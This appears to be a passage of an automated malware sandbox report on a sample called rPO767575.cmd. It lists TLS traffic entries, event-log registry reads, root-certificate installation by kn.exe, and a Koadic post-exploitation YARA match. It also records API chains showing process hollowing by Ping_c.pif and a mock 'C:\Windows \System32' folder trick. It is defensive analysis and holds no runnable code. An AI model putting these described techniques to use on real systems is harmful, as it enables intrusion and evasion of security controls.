        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53588
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53590
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53594
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53593
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53591
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknownNetwork traffic detected: HTTP traffic on port 53584 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownNetwork traffic detected: HTTP traffic on port 53525 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53516
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53515
        Source: unknownNetwork traffic detected: HTTP traffic on port 53590 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53519
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53510
        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53573 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53511
        Source: unknownNetwork traffic detected: HTTP traffic on port 53534 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53576 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53528 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 53520 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53529
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53528
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53526
        Source: unknownNetwork traffic detected: HTTP traffic on port 53591 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53585 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53520
        Source: unknownNetwork traffic detected: HTTP traffic on port 53510 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53525
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53523
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53522
        Source: unknownNetwork traffic detected: HTTP traffic on port 53579 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53582 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53515 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53588 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53538
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53537
        Source: unknownNetwork traffic detected: HTTP traffic on port 53567 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53532
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53531
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53535
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53534
        Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53553 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53522 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53547 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53564 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53549
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53543
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53541
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53540
        Source: unknownNetwork traffic detected: HTTP traffic on port 53558 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53547
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53546
        Source: unknownNetwork traffic detected: HTTP traffic on port 53535 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53516 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53544
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53550
        Source: unknownNetwork traffic detected: HTTP traffic on port 53529 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53561 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53544 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53538 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53553
        Source: unknownNetwork traffic detected: HTTP traffic on port 53594 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53552
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53558
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53557
        Source: unknownNetwork traffic detected: HTTP traffic on port 53549 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53561
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53560
        Source: unknownNetwork traffic detected: HTTP traffic on port 53541 -> 443
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49708 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49720 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49723 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49726 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49729 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53511 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53516 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53520 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53523 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53526 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53529 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53532 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53535 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53538 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53541 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53544 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53547 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53550 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53553 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53558 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53561 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53564 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53567 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53570 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53573 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53576 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53579 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53582 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53585 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53588 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53591 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53594 version: TLS 1.2

        E-Banking Fraud

        barindex
        Registers a new ROOT certificate
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080060BC CertCreateCertificateContext,GetLastError,#357,CertAddCertificateContextToStore,GetLastError,#357,CertCompareCertificateName,CertOpenStore,GetLastError,CertAddCertificateContextToStore,GetLastError,CertFreeCertificateContext,CertCloseStore,9_2_00007FF6080060BC

        Spam, unwanted Advertisements and Ransom Demands

        barindex
        Reads the Security eventlog
        Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
        Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
        Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
        Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
        Reads the System eventlog
        Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
        Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
        Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
        Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB29A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,9_2_00007FF607FB29A0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDEA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,9_2_00007FF607FDEA7C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608026EA8 NCryptImportKey,#360,9_2_00007FF608026EA8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF0EF4 NCryptImportKey,#205,#359,#359,#357,9_2_00007FF607FF0EF4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,9_2_00007FF607FE0F58
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FEE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,9_2_00007FF607FEE1F8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB25E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,9_2_00007FF607FB25E8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60802A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,9_2_00007FF60802A740
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,9_2_00007FF607F7F9B8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F8FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,9_2_00007FF607F8FC20
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080293A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,9_2_00007FF6080293A0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,9_2_00007FF607FF342C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,9_2_00007FF607FE184C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080298B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,9_2_00007FF6080298B0

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: rPO767575.cmd, type: SAMPLEMatched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F03D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,4_2_00007FF744F03D94
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F31538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,4_2_00007FF744F31538
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F1898C NtQueryInformationToken,4_2_00007FF744F1898C
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F189E4 NtQueryInformationToken,NtQueryInformationToken,4_2_00007FF744F189E4
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F188C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,4_2_00007FF744F188C0
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F2BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,4_2_00007FF744F2BCF0
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F18114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,4_2_00007FF744F18114
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F17FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,4_2_00007FF744F17FF8
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F03D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,5_2_00007FF744F03D94
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F31538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,5_2_00007FF744F31538
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F1898C NtQueryInformationToken,5_2_00007FF744F1898C
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F189E4 NtQueryInformationToken,NtQueryInformationToken,5_2_00007FF744F189E4
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F188C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,5_2_00007FF744F188C0
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F2BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,5_2_00007FF744F2BCF0
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F18114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,5_2_00007FF744F18114
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F17FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,5_2_00007FF744F17FF8
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F03D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,8_2_00007FF744F03D94
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F31538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,8_2_00007FF744F31538
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F1898C NtQueryInformationToken,8_2_00007FF744F1898C
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F189E4 NtQueryInformationToken,NtQueryInformationToken,8_2_00007FF744F189E4
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F188C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,8_2_00007FF744F188C0
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F2BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,8_2_00007FF744F2BCF0
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F18114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,8_2_00007FF744F18114
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F17FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,8_2_00007FF744F17FF8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60804C964 NtQuerySystemTime,RtlTimeToSecondsSince1970,9_2_00007FF60804C964
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A399890 NtSetInformationKey,NtQueryKey,RegQueryInfoKeyW,lstrlenW,memset,RegEnumKeyExW,RegOpenKeyExW,RegCloseKey,19_2_00007FF73A399890
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_0295D6D4 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,31_2_0295D6D4
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_0295D654 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,31_2_0295D654
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_0295C7B8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,31_2_0295C7B8
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_02957A74 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory,31_2_02957A74
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_02958170 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,31_2_02958170
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_0295816E CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,31_2_0295816E
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_0295C6D4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,31_2_0295C6D4
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_0295C6D2 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,31_2_0295C6D2
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_02957A72 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory,31_2_02957A72
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_02957CA8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,31_2_02957CA8
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F03D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,35_2_00007FF744F03D94
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F31538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,35_2_00007FF744F31538
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F1898C NtQueryInformationToken,35_2_00007FF744F1898C
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F189E4 NtQueryInformationToken,NtQueryInformationToken,35_2_00007FF744F189E4
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F188C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,35_2_00007FF744F188C0
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F2BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,35_2_00007FF744F2BCF0
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F18114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,35_2_00007FF744F18114
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F17FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,35_2_00007FF744F17FF8
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F18114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,38_2_00007FF744F18114
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F17FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,38_2_00007FF744F17FF8
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F03D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,38_2_00007FF744F03D94
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F31538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,38_2_00007FF744F31538
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F1898C NtQueryInformationToken,38_2_00007FF744F1898C
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F189E4 NtQueryInformationToken,NtQueryInformationToken,38_2_00007FF744F189E4
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F188C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,38_2_00007FF744F188C0
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F2BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,38_2_00007FF744F2BCF0
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F05240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,4_2_00007FF744F05240
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F14224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList,4_2_00007FF744F14224
        Source: C:\Users\Public\alpha.exeFile created: C:\WindowsJump to behavior
        Source: C:\Users\Public\alpha.exeFile created: C:\Windows \System32Jump to behavior
        Source: C:\Windows\System32\extrac32.exeFile created: C:\Windows \System32\per.exeJump to behavior
        Source: C:\Users\Public\alpha.exeFile deleted: C:\Windows \System32
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F0AA544_2_00007FF744F0AA54
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F07D304_2_00007FF744F07D30
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F155544_2_00007FF744F15554
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F137D84_2_00007FF744F137D8
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F142244_2_00007FF744F14224
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F2AA304_2_00007FF744F2AA30
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F0D2504_2_00007FF744F0D250
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F09E504_2_00007FF744F09E50
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F10A6C4_2_00007FF744F10A6C
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F0E6804_2_00007FF744F0E680
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F2EE884_2_00007FF744F2EE88
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F27F004_2_00007FF744F27F00
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F315384_2_00007FF744F31538
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F06EE44_2_00007FF744F06EE4
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F2D9D04_2_00007FF744F2D9D0
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F081D44_2_00007FF744F081D4
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F076504_2_00007FF744F07650
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F052404_2_00007FF744F05240
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F08DF84_2_00007FF744F08DF8
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F04A304_2_00007FF744F04A30
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F022204_2_00007FF744F02220
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F0CE104_2_00007FF744F0CE10
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F034104_2_00007FF744F03410
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F06BE04_2_00007FF744F06BE0
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F2AC4C4_2_00007FF744F2AC4C
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F178544_2_00007FF744F17854
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F03F904_2_00007FF744F03F90
